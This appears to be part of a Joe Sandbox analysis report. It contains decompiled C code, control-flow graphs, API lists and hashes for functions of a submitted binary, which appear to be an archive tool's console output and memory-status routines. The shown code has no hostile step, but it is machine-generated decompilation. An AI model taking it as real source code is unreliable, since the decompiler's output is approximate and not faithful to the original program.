                                                                                                                    control_flow_graph 775 b46e41-b46e61 __EH_prolog 776 b470b4 775->776 777 b46e67-b46e9b fputs call b47170 775->777 778 b470b6-b470c4 776->778 781 b46ef7-b46efc 777->781 782 b46e9d-b46ea0 777->782 785 b46f05-b46f0e 781->785 786 b46efe-b46f03 781->786 783 b46ea2-b46eb8 fputs call b11fe9 782->783 784 b46eba-b46ebc 782->784 783->781 789 b46ec5-b46ece 784->789 790 b46ebe-b46ec3 784->790 787 b46f11-b46f3f call b47170 call b47451 785->787 786->787 800 b46f41-b46f48 call b4714e 787->800 801 b46f4d-b46f5e call b47394 787->801 793 b46ed1-b46ef6 call b12dd3 call b473f5 call b11e89 789->793 790->793 793->781 800->801 801->778 808 b46f64-b46f6e 801->808 809 b46f70-b46f77 call b470ea 808->809 810 b46f7c-b46f8a 808->810 809->810 810->778 813 b46f90-b46f93 810->813 814 b46fe5-b46fef 813->814 815 b46f95-b46fb5 813->815 816 b470a5-b470ae 814->816 817 b46ff5-b47010 fputs 814->817 819 b470c7-b470cc 815->819 820 b46fbb-b46fc5 call b47394 815->820 816->776 816->777 817->816 823 b47016-b4702a 817->823 824 b470e0-b470e8 SysFreeString 819->824 825 b46fca-b46fcc 820->825 826 b470a2 823->826 827 b4702c-b4704e 823->827 824->778 825->819 828 b46fd2-b46fe3 SysFreeString 825->828 826->816 830 b47050-b47074 827->830 831 b470ce-b470d0 827->831 828->814 828->815 834 b47076-b470a0 call b472d6 call b19312 SysFreeString 830->834 835 b470d2-b470da call b19312 830->835 832 b470dd 831->832 832->824 834->826 834->827 835->832
                                                                                                                    C-Code - Quality: 59%
                                                                                                                    			E00B46E41(struct _IO_FILE** __ecx, intOrPtr __edx) {
				void* __ebx;
				short _t102;
				signed int _t108;
				signed int _t109;
				char* _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t136;
				char* _t140;
				void* _t142;
				struct _IO_FILE** _t147;
				signed int _t159;
				void* _t199;
				void* _t200;
				void* _t204;
				signed int _t205;
				void* _t206;
				intOrPtr* _t207;
				void* _t208;
				intOrPtr* _t211;
				intOrPtr* _t212;
				short _t213;
				void* _t214;

				L00B7F140(E00B86108, _t214);
				 *(_t214 - 0x14) =  *(_t214 - 0x14) & 0x00000000;
				 *((intOrPtr*)(_t214 - 0x20)) = __edx;
				_t147 = __ecx;
				if( *((intOrPtr*)( *((intOrPtr*)(_t214 + 8)) + 4)) <= 0) {
					L29:
					_t102 = 0;
					L30:
					 *[fs:0x0] =  *((intOrPtr*)(_t214 - 0xc));
					return _t102;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 + 8)))) +  *(_t214 - 0x14) * 4));
					_t204 = _t211 + 0x78;
					fputs("--\n",  *_t147); // executed
					_push(0);
					_push( *((intOrPtr*)(_t211 + 0x18)));
					E00B47170(_t147, "Path"); // executed
					_t108 =  *(_t204 + 0xc);
					if(_t108 >= 0) {
						if(_t108 !=  *(_t211 + 0x3c)) {
							__eflags = _t108;
							if(_t108 >= 0) {
								_t140 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 - 0x20)) + 8)) + _t108 * 4)) + 0x10));
							} else {
								_t140 = "#";
							}
							E00B12DD3(_t214 - 0x40, _t140);
							 *(_t214 - 4) =  *(_t214 - 4) & 0x00000000;
							_t142 = L00B473F5(_t147, _t214 - 0x40, 1);
							_t23 = _t214 - 4;
							 *_t23 =  *(_t214 - 4) | 0xffffffff;
							__eflags =  *_t23;
							E00B11E89(_t142,  *((intOrPtr*)(_t214 - 0x40)));
						} else {
							fputs("Warning: The archive is open with offset",  *_t147);
							E00B11FE9(_t147);
						}
					}
					_t109 =  *(_t211 + 0x3c);
					if(_t109 >= 0) {
						_t111 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t214 - 0x20)) + 8)) + _t109 * 4)) + 0x10));
					} else {
						_t111 = "#";
					}
					_push(0);
					_push(_t111);
					E00B47170(_t147, "Type"); // executed
					L00B47451(_t147, _t204);
					_t159 =  *(_t211 + 0xdc);
					_t115 =  *((intOrPtr*)(_t211 + 0xd8)) +  *((intOrPtr*)(_t211 + 0x50));
					asm("adc ecx, [esi+0x54]");
					if((_t115 | _t159) != 0) {
						_push(_t159);
						_push(_t115);
						_t200 = 0x24;
						L00B4714E(_t147, _t200);
					}
					_t212 =  *_t211;
					_push(0);
					_push(0x2c);
					_t102 = E00B47394(_t147, _t147, _t212); // executed
					if(_t102 != 0) {
						goto L30;
					}
					_t116 =  *(_t204 + 0x10);
					_t205 =  *(_t204 + 0x14);
					if((_t116 | _t205) != 0) {
						_push(_t205);
						_push(_t116);
						_t199 = 0x57;
						L00B470EA(_t147, _t199);
					}
					_t102 =  *((intOrPtr*)( *_t212 + 0x2c))(_t212, _t214 - 0x24);
					_t206 = 0;
					if(_t102 != 0) {
						goto L30;
					} else {
						if( *((intOrPtr*)(_t214 - 0x24)) <= 0) {
							L21:
							_t207 =  *((intOrPtr*)(_t214 + 8));
							if( *(_t214 - 0x14) ==  *((intOrPtr*)(_t207 + 4)) - 1) {
								L28:
								 *(_t214 - 0x14) =  *(_t214 - 0x14) + 1;
								if( *(_t214 - 0x14) <  *((intOrPtr*)(_t207 + 4))) {
									continue;
								}
								goto L29;
							}
							fputs("----\n",  *_t147);
							_push(_t214 - 0x2c);
							_push(_t212);
							if( *((intOrPtr*)( *_t212 + 0x24))() != 0) {
								goto L28;
							}
							_t208 = 0;
							 *(_t214 - 0x18) =  *( *((intOrPtr*)( *_t207 + 4 +  *(_t214 - 0x14) * 4)) + 0x40);
							if( *((intOrPtr*)(_t214 - 0x2c)) <= 0) {
								L27:
								_t207 =  *((intOrPtr*)(_t214 + 8));
								goto L28;
							} else {
								goto L24;
							}
							while(1) {
								L24:
								 *(_t214 - 0x1c) =  *(_t214 - 0x1c) & 0x00000000;
								 *(_t214 - 4) = 2;
								_t128 =  *((intOrPtr*)( *_t212 + 0x28))(_t212, _t208, _t214 - 0x1c, _t214 - 0x28, _t214 - 0x10);
								if(_t128 != 0) {
									break;
								}
								 *((short*)(_t214 - 0x50)) = 0;
								 *((short*)(_t214 - 0x4e)) = 0;
								 *((intOrPtr*)(_t214 - 0x48)) = 0;
								 *(_t214 - 4) = 3;
								_t130 =  *((intOrPtr*)( *_t212 + 0x18))(_t212,  *(_t214 - 0x18),  *((intOrPtr*)(_t214 - 0x28)), _t214 - 0x50);
								_t235 = _t130;
								 *((intOrPtr*)(_t214 - 0x34)) = _t130;
								if(_t130 != 0) {
									L00B19312(_t214 - 0x50);
									_t213 =  *((intOrPtr*)(_t214 - 0x34));
									L34:
									_push( *(_t214 - 0x1c));
									L35:
									__imp__#6();
									_t102 = _t213;
									goto L30;
								}
								E00B472D6(_t147, _t147,  *((intOrPtr*)(_t214 - 0x28)), _t235);
								L00B19312(_t214 - 0x50);
								 *(_t214 - 4) =  *(_t214 - 4) | 0xffffffff;
								__imp__#6( *(_t214 - 0x1c),  *(_t214 - 0x1c), _t214 - 0x50);
								_t208 = _t208 + 1;
								if(_t208 <  *((intOrPtr*)(_t214 - 0x2c))) {
									continue;
								}
								goto L27;
							}
							_t213 = _t128;
							goto L34;
						} else {
							goto L18;
						}
						while(1) {
							L18:
							 *(_t214 - 0x18) =  *(_t214 - 0x18) & 0x00000000;
							 *(_t214 - 4) = 1;
							_t136 =  *((intOrPtr*)( *_t212 + 0x30))(_t212, _t206, _t214 - 0x18, _t214 - 0x30, _t214 - 0xe);
							if(_t136 != 0) {
								break;
							}
							_push( *(_t214 - 0x18));
							_push( *((intOrPtr*)(_t214 - 0x30)));
							_t136 = E00B47394(_t147, _t147, _t212); // executed
							if(_t136 != 0) {
								break;
							}
							 *(_t214 - 4) =  *(_t214 - 4) | 0xffffffff;
							__imp__#6( *(_t214 - 0x18));
							_t206 = _t206 + 1;
							if(_t206 <  *((intOrPtr*)(_t214 - 0x24))) {
								continue;
							}
							goto L21;
						}
						_push( *(_t214 - 0x18));
						_t213 = _t136;
						goto L35;
					}
				}
				goto L30;
			}




























                                                                                                                    0x00b46e46
                                                                                                                    0x00b46e51
                                                                                                                    0x00b46e5c
                                                                                                                    0x00b46e5f
                                                                                                                    0x00b46e61
                                                                                                                    0x00b470b4
                                                                                                                    0x00b470b4
                                                                                                                    0x00b470b6
                                                                                                                    0x00b470bc
                                                                                                                    0x00b470c4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46e67
                                                                                                                    0x00b46e67
                                                                                                                    0x00b46e76
                                                                                                                    0x00b46e79
                                                                                                                    0x00b46e7c
                                                                                                                    0x00b46e8c
                                                                                                                    0x00b46e8e
                                                                                                                    0x00b46e91
                                                                                                                    0x00b46e96
                                                                                                                    0x00b46e9b
                                                                                                                    0x00b46ea0
                                                                                                                    0x00b46eba
                                                                                                                    0x00b46ebc
                                                                                                                    0x00b46ece
                                                                                                                    0x00b46ebe
                                                                                                                    0x00b46ebe
                                                                                                                    0x00b46ebe
                                                                                                                    0x00b46ed5
                                                                                                                    0x00b46eda
                                                                                                                    0x00b46ee5
                                                                                                                    0x00b46eea
                                                                                                                    0x00b46eea
                                                                                                                    0x00b46eea
                                                                                                                    0x00b46ef1
                                                                                                                    0x00b46ea2
                                                                                                                    0x00b46ea9
                                                                                                                    0x00b46eb3
                                                                                                                    0x00b46eb3
                                                                                                                    0x00b46ea0
                                                                                                                    0x00b46ef7
                                                                                                                    0x00b46efc
                                                                                                                    0x00b46f0e
                                                                                                                    0x00b46efe
                                                                                                                    0x00b46efe
                                                                                                                    0x00b46efe
                                                                                                                    0x00b46f11
                                                                                                                    0x00b46f13
                                                                                                                    0x00b46f1b
                                                                                                                    0x00b46f24
                                                                                                                    0x00b46f2f
                                                                                                                    0x00b46f35
                                                                                                                    0x00b46f38
                                                                                                                    0x00b46f3f
                                                                                                                    0x00b46f41
                                                                                                                    0x00b46f42
                                                                                                                    0x00b46f47
                                                                                                                    0x00b46f48
                                                                                                                    0x00b46f48
                                                                                                                    0x00b46f4d
                                                                                                                    0x00b46f4f
                                                                                                                    0x00b46f51
                                                                                                                    0x00b46f57
                                                                                                                    0x00b46f5e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46f64
                                                                                                                    0x00b46f67
                                                                                                                    0x00b46f6e
                                                                                                                    0x00b46f70
                                                                                                                    0x00b46f71
                                                                                                                    0x00b46f76
                                                                                                                    0x00b46f77
                                                                                                                    0x00b46f77
                                                                                                                    0x00b46f83
                                                                                                                    0x00b46f86
                                                                                                                    0x00b46f8a
                                                                                                                    0x00000000
                                                                                                                    0x00b46f90
                                                                                                                    0x00b46f93
                                                                                                                    0x00b46fe5
                                                                                                                    0x00b46fe5
                                                                                                                    0x00b46fef
                                                                                                                    0x00b470a5
                                                                                                                    0x00b470a5
                                                                                                                    0x00b470ae
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b470ae
                                                                                                                    0x00b46ffc
                                                                                                                    0x00b47009
                                                                                                                    0x00b4700a
                                                                                                                    0x00b47010
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4701b
                                                                                                                    0x00b47027
                                                                                                                    0x00b4702a
                                                                                                                    0x00b470a2
                                                                                                                    0x00b470a2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4702c
                                                                                                                    0x00b4702c
                                                                                                                    0x00b4702c
                                                                                                                    0x00b47040
                                                                                                                    0x00b47047
                                                                                                                    0x00b4704e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b47050
                                                                                                                    0x00b47054
                                                                                                                    0x00b47058
                                                                                                                    0x00b47061
                                                                                                                    0x00b4706c
                                                                                                                    0x00b4706f
                                                                                                                    0x00b47071
                                                                                                                    0x00b47074
                                                                                                                    0x00b470d5
                                                                                                                    0x00b470da
                                                                                                                    0x00b470dd
                                                                                                                    0x00b470dd
                                                                                                                    0x00b470e0
                                                                                                                    0x00b470e0
                                                                                                                    0x00b470e6
                                                                                                                    0x00000000
                                                                                                                    0x00b470e6
                                                                                                                    0x00b47082
                                                                                                                    0x00b4708a
                                                                                                                    0x00b4708f
                                                                                                                    0x00b47096
                                                                                                                    0x00b4709c
                                                                                                                    0x00b470a0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b470a0
                                                                                                                    0x00b470ce
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46f95
                                                                                                                    0x00b46f95
                                                                                                                    0x00b46f95
                                                                                                                    0x00b46fa9
                                                                                                                    0x00b46fb0
                                                                                                                    0x00b46fb5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46fbb
                                                                                                                    0x00b46fc2
                                                                                                                    0x00b46fc5
                                                                                                                    0x00b46fcc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46fd5
                                                                                                                    0x00b46fd9
                                                                                                                    0x00b46fdf
                                                                                                                    0x00b46fe3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46fe3
                                                                                                                    0x00b470c7
                                                                                                                    0x00b470ca
                                                                                                                    0x00000000
                                                                                                                    0x00b470ca
                                                                                                                    0x00b46f8a
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B46E46
                                                                                                                    • fputs.MSVCRT ref: 00B46E7C
                                                                                                                      • Part of subcall function 00B47170: __EH_prolog.LIBCMT ref: 00B47175
                                                                                                                      • Part of subcall function 00B47170: fputs.MSVCRT ref: 00B4718A
                                                                                                                      • Part of subcall function 00B47170: fputs.MSVCRT ref: 00B47193
                                                                                                                    • fputs.MSVCRT ref: 00B46EA9
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                      • Part of subcall function 00B19312: VariantClear.OLEAUT32(?), ref: 00B19334
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00B46FD9
                                                                                                                    • fputs.MSVCRT ref: 00B46FFC
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00B47096
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00B470E0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                                                                                                    • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                                                                                                    • API String ID: 2889736305-3797937567
                                                                                                                    • Opcode ID: 75734c190bb3458f5a5dd5c8a4be6340e24317688ddac33e7fe179279260d60c
                                                                                                                    • Instruction ID: 427320e0a83e193c9752fa965146e822efca610e992f6dc8a653ebb04f78e26f
                                                                                                                    • Opcode Fuzzy Hash: 75734c190bb3458f5a5dd5c8a4be6340e24317688ddac33e7fe179279260d60c
                                                                                                                    • Instruction Fuzzy Hash: CB916971A04205EFDF14EFA4D885EAEB7F5FF48310F2041A9E412A72A0DB70AE45DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B19852 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 47libraryloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 842 b19852-b19885 GetModuleHandleA 844 b198b2-b198c9 GlobalMemoryStatus 842->844 845 b19887-b1988f GlobalMemoryStatusEx 842->845 846 b198cb 844->846 847 b198ce-b198d0 844->847 845->844 848 b19891-b1989a 845->848 846->847 849 b198d4-b198d8 847->849 850 b198a8 848->850 851 b1989c 848->851 852 b198ab-b198b0 850->852 853 b198a3-b198a6 851->853 854 b1989e-b198a1 851->854 852->849 853->852 854->850 854->853
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00B19852(intOrPtr* __ecx) {
				struct _MEMORYSTATUS _v36;
				signed int _v56;
				intOrPtr _v60;
				struct _MEMORYSTATUSEX _v100;
				_Unknown_base(*)()* _t20;
				intOrPtr _t22;
				intOrPtr _t24;
				signed int _t27;
				intOrPtr* _t28;
				void* _t31;

				_t28 = __ecx;
				 *__ecx = 0x80000000;
				 *(__ecx + 4) =  *(__ecx + 4) & 0x00000000;
				_v100.dwLength = 0x40;
				_t20 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GlobalMemoryStatusEx");
				if(_t20 == 0) {
					L8:
					_v36.dwLength = 0x20;
					GlobalMemoryStatus( &_v36);
					_t22 = _v36.dwTotalVirtual;
					if(_t22 >= _v36.dwTotalPhys) {
						_t22 = _v36.dwTotalPhys;
					}
					 *_t28 = _t22;
					 *(_t28 + 4) =  *(_t28 + 4) & 0x00000000;
				} else {
					GlobalMemoryStatusEx( &_v100); // executed
					if(_t20 == 0) {
						goto L8;
					} else {
						_t27 = _v56;
						_t24 = _v100.ullTotalPhys;
						_t31 = _t27 - _v100.ullAvailPhys;
						if(_t31 > 0 || _t31 >= 0 && _v60 >= _t24) {
							_t27 = _v100.ullAvailPhys;
						} else {
							_t24 = _v60;
						}
						 *_t28 = _t24;
						 *(_t28 + 4) = _t27;
					}
				}
				return 1;
			}













                                                                                                                    0x00b19859
                                                                                                                    0x00b19865
                                                                                                                    0x00b1986b
                                                                                                                    0x00b1986f
                                                                                                                    0x00b1987d
                                                                                                                    0x00b19885
                                                                                                                    0x00b198b2
                                                                                                                    0x00b198b5
                                                                                                                    0x00b198bd
                                                                                                                    0x00b198c3
                                                                                                                    0x00b198c9
                                                                                                                    0x00b198cb
                                                                                                                    0x00b198cb
                                                                                                                    0x00b198ce
                                                                                                                    0x00b198d0
                                                                                                                    0x00b19887
                                                                                                                    0x00b1988b
                                                                                                                    0x00b1988f
                                                                                                                    0x00000000
                                                                                                                    0x00b19891
                                                                                                                    0x00b19891
                                                                                                                    0x00b19894
                                                                                                                    0x00b19897
                                                                                                                    0x00b1989a
                                                                                                                    0x00b198a8
                                                                                                                    0x00b198a3
                                                                                                                    0x00b198a3
                                                                                                                    0x00b198a3
                                                                                                                    0x00b198ab
                                                                                                                    0x00b198ad
                                                                                                                    0x00b198ad
                                                                                                                    0x00b1988f
                                                                                                                    0x00b198d8

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00B19876
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00B1987D
                                                                                                                    • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00B1988B
                                                                                                                    • GlobalMemoryStatus.KERNEL32 ref: 00B198BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                                                                                                    • String ID: $@$GlobalMemoryStatusEx$kernel32.dll$N)w
                                                                                                                    • API String ID: 180289352-205944561
                                                                                                                    • Opcode ID: 31f312ff24904e7c27e924856cbea174e222f4c202779120d438ea53e25f68f6
                                                                                                                    • Instruction ID: ceaa7d6a2ca45503085585713d7bae7953d2c6208f7d12568b184900b2996b99
                                                                                                                    • Opcode Fuzzy Hash: 31f312ff24904e7c27e924856cbea174e222f4c202779120d438ea53e25f68f6
                                                                                                                    • Instruction Fuzzy Hash: 04116970910349DBDF24DFA4C899BEDBBF5FF04741F540858E442A7290D774A884CB64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B45145 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 252COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 855 b45145-b4515f __EH_prolog 856 b45161-b45171 call b4b618 855->856 857 b4518a-b4519b call b44839 855->857 856->857 862 b45173-b45187 856->862 863 b451a1-b451b9 857->863 864 b453da-b453dd 857->864 862->857 865 b451be-b451c0 863->865 866 b451bb 863->866 867 b45410-b45428 864->867 868 b453df-b453e7 864->868 871 b451c2-b451c5 865->871 872 b451cb-b451d3 865->872 866->865 869 b4542f-b45437 867->869 870 b4542a call b11fda 867->870 873 b454d6 call b4574e 868->873 874 b453ed-b453f3 call b46e41 868->874 869->873 878 b4543d-b4547b fputs call b12163 call b11fe9 call b474b4 869->878 870->869 871->872 877 b4529d-b452a8 call b454ec 871->877 879 b451d5-b451de call b11fe9 872->879 880 b451fd-b451ff 872->880 888 b454db-b454e9 873->888 882 b453f8-b453fa 874->882 899 b452b3-b452bb 877->899 900 b452aa-b452ad 877->900 878->888 935 b4547d-b45483 878->935 879->880 904 b451e0-b451f8 call b12155 call b11fe9 879->904 883 b45201-b45209 880->883 884 b4522e-b45232 880->884 882->888 889 b45400-b4540b call b11fe9 882->889 890 b45216-b45227 883->890 891 b4520b-b45211 call b44f20 883->891 893 b45234-b4523c 884->893 894 b45283-b4528b 884->894 889->873 890->884 891->890 901 b4523e-b45266 fputs call b11fe9 call b11ffc call b11fe9 893->901 902 b4526b-b4527c 893->902 894->877 905 b4528d-b45298 call b11fe9 call b11fda 894->905 909 b452e5-b452e7 899->909 910 b452bd-b452c6 call b11fe9 899->910 900->899 908 b4538e-b45392 900->908 901->902 902->894 904->880 905->877 917 b45394-b453a2 908->917 918 b453c6-b453d2 908->918 914 b45316-b4531a 909->914 915 b452e9-b452f1 909->915 910->909 940 b452c8-b452e0 call b12155 call b11fe9 910->940 926 b4531c-b45324 914->926 927 b4536b-b45373 914->927 923 b452f3-b452f9 call b44f20 915->923 924 b452fe-b4530f 915->924 928 b453a4-b453b6 call b45030 917->928 929 b453bf 917->929 918->863 932 b453d8 918->932 923->924 924->914 937 b45326-b4534e fputs call b11fe9 call b11ffc call b11fe9 926->937 938 b45353-b45364 926->938 927->908 942 b45375-b45381 call b11fe9 927->942 928->929 954 b453b8-b453ba call b11fda 928->954 929->918 932->864 943 b45485-b4548b 935->943 944 b454cb-b454d1 call b11fda 935->944 937->938 938->927 940->909 942->908 957 b45383-b45389 call b11fda 942->957 951 b4548d-b4549d fputs 943->951 952 b4549f-b454ba call b23c23 call b11ffc call b11e89 943->952 944->873 958 b454bf-b454c6 call b11fe9 951->958 952->958 954->929 957->908 958->944
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00B45145(void* __ecx) {
				void* __edi;
				struct _IO_FILE** _t108;
				void* _t109;
				void* _t124;
				signed int _t162;
				signed int _t164;
				void* _t165;
				struct _IO_FILE** _t166;
				struct _IO_FILE** _t167;
				intOrPtr _t214;
				void* _t219;
				intOrPtr _t222;
				void* _t223;
				intOrPtr* _t224;
				void* _t226;
				void* _t228;

				L00B7F140(0xb85fa8, _t228);
				_t226 = __ecx;
				_t162 = 0;
				_push(_t219);
				if( *((intOrPtr*)(__ecx + 0xb8)) != 0) {
					E00B4B618(__ecx + 0x14, _t219, 1);
					if( *((intOrPtr*)(_t226 + 0xb8)) != 0) {
						 *((intOrPtr*)(_t226 + 0x24)) = 0;
						 *((intOrPtr*)(_t226 + 0x28)) = 0;
						 *((intOrPtr*)(_t226 + 0x30)) = 0;
						 *( *(_t226 + 0x2c)) =  *( *(_t226 + 0x2c)) & 0;
						 *((intOrPtr*)(_t226 + 0x3c)) = 0;
						 *((short*)( *((intOrPtr*)(_t226 + 0x38)))) = 0;
					}
				}
				E00B44839(_t226 - 4);
				 *(_t228 - 0x10) = _t162;
				if( *((intOrPtr*)( *((intOrPtr*)(_t228 + 0xc)) + 4)) <= _t162) {
					L44:
					if( *((intOrPtr*)(_t228 + 0x14)) != _t162) {
						 *((intOrPtr*)(_t226 + 0x124)) =  *((intOrPtr*)(_t226 + 0x124)) + 1;
						asm("adc [eax+0x4], ebx");
						_t170 =  *(_t226 + 0xc4);
						__eflags =  *(_t226 + 0xc4) - _t162;
						if( *(_t226 + 0xc4) != _t162) {
							L00B11FDA(_t170);
						}
						_t108 =  *(_t226 + 0xc8);
						__eflags = _t108 - _t162;
						if(_t108 == _t162) {
							L58:
							_t109 = L00B4574E();
							goto L59;
						} else {
							fputs( *0xb8c1e0,  *_t108);
							_push( *((intOrPtr*)(_t228 + 0x10)));
							E00B12163( *(_t226 + 0xc8));
							E00B11FE9( *(_t226 + 0xc8));
							_t109 = L00B474B4( *(_t226 + 0xc8),  *((intOrPtr*)(_t228 + 8)), _t228,  *((intOrPtr*)(_t228 + 0xc)));
							__eflags = _t109 - _t162;
							if(_t109 != _t162) {
								L59:
								 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
								return _t109;
							}
							_t214 =  *((intOrPtr*)(_t228 + 0x14));
							__eflags = _t214 - 1;
							if(_t214 != 1) {
								__eflags = _t214 - 0x8007000e;
								if(_t214 != 0x8007000e) {
									_push( *((intOrPtr*)(L00B23C23())));
									 *(_t228 - 4) = _t162;
									E00B11E89(L00B11FFC( *(_t226 + 0xc8), __eflags),  *((intOrPtr*)(_t228 - 0x24)));
								} else {
									fputs("Can\'t allocate required memory",  *( *(_t226 + 0xc8)));
								}
								E00B11FE9( *(_t226 + 0xc8));
							}
							L00B11FDA( *(_t226 + 0xc8));
							goto L58;
						}
					}
					_t183 =  *(_t226 + 0xc4);
					if( *(_t226 + 0xc4) == _t162) {
						goto L58;
					}
					_t109 = E00B46E41(_t183,  *((intOrPtr*)(_t228 + 8)),  *((intOrPtr*)(_t228 + 0xc))); // executed
					if(_t109 != _t162) {
						goto L59;
					}
					E00B11FE9( *(_t226 + 0xc4));
					goto L58;
				} else {
					goto L4;
				}
				do {
					L4:
					_t222 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t228 + 0xc)))) +  *(_t228 - 0x10) * 4));
					 *((intOrPtr*)(_t228 - 0x14)) = _t222;
					_t223 = _t222 + 0x78;
					_t164 =  *(_t223 + 4);
					if( *((char*)(_t223 + 1)) != 0) {
						_t164 = _t164 | 0x00000020;
					}
					if(_t164 != 0 ||  *((intOrPtr*)(_t223 + 0x1c)) != _t164) {
						_t186 =  *(_t226 + 0xc8);
						if( *(_t226 + 0xc8) != 0) {
							E00B11FE9(_t186);
							if( *(_t228 - 0x10) != 0) {
								E00B12155( *((intOrPtr*)(_t228 - 0x14)) + 0x18);
								E00B11FE9( *(_t226 + 0xc8));
							}
						}
						if(_t164 != 0) {
							_t209 =  *(_t226 + 0xc8);
							if( *(_t226 + 0xc8) != 0) {
								L00B44F20(_t209, "ERRORS:", _t164);
							}
							 *((intOrPtr*)(_t226 + 0x13c)) =  *((intOrPtr*)(_t226 + 0x13c)) + 1;
							asm("adc dword [eax+0x4], 0x0");
							 *((char*)(_t226 + 0x114)) = 1;
						}
						if( *((intOrPtr*)(_t223 + 0x1c)) != 0) {
							_t167 =  *(_t226 + 0xc8);
							_t248 = _t167;
							if(_t167 != 0) {
								 *((intOrPtr*)(_t228 - 0x18)) =  *((intOrPtr*)(_t223 + 0x18));
								fputs("ERRORS:",  *_t167);
								E00B11FE9(_t167);
								_push( *((intOrPtr*)(_t228 - 0x18)));
								E00B11FE9(L00B11FFC(_t167, _t248));
							}
							 *((intOrPtr*)(_t226 + 0x13c)) =  *((intOrPtr*)(_t226 + 0x13c)) + 1;
							asm("adc dword [eax+0x4], 0x0");
							 *((char*)(_t226 + 0x114)) = 1;
						}
						_t187 =  *(_t226 + 0xc8);
						if( *(_t226 + 0xc8) != 0) {
							E00B11FE9(_t187);
							L00B11FDA( *(_t226 + 0xc8));
						}
					}
					_t124 = L00B454EC(_t223);
					_t165 = _t124;
					if(_t165 != 0 ||  *((intOrPtr*)(_t223 + 0x28)) != _t124) {
						_t189 =  *(_t226 + 0xc4);
						if( *(_t226 + 0xc4) != 0) {
							E00B11FE9(_t189);
							if( *(_t228 - 0x10) != 0) {
								E00B12155( *((intOrPtr*)(_t228 - 0x14)) + 0x18);
								E00B11FE9( *(_t226 + 0xc4));
